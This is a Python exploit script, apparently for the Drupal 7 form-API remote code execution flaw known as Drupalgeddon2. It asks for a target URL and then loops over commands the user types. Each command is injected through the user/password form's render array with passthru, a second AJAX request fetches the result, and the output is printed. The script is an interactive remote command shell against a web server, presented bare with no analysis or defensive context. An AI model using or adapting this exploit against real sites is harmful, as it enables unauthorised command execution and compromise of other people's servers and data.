exploit.py

1. #!/usr/bin/env python3
2.  
3. import requests
4. import re
5. import urllib3
6. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
7. #proxies ={'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
8. verify = False
9.  
10.  
11. url = raw_input("Url: ")
12.  
13. get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'dir', 'name[#type]':'markup'}
14. post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
15.  
16. while True:
17. cmd = raw_input("CMD> ")
18. if cmd == "quit":
19. break
20. else:
21. get_params['name[#markup]'] = cmd
22. r = requests.post(url, data=post_params, params=get_params)
23.  
24. m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
25. if m:
26. found = m.group(1)
27. get_params2 = {'q':'file/ajax/name/#value/' + found}
28. post_params2 = {'form_build_id':found}
29. r = requests.post(url, data=post_params2, params=get_params2)
30.  
31. string = str(r.text)
32. for j in range(0,len(string)):
33. if string[j] == "{" or string[j] == "[":
34. pos1 = j
35. break
36. print string[:pos1]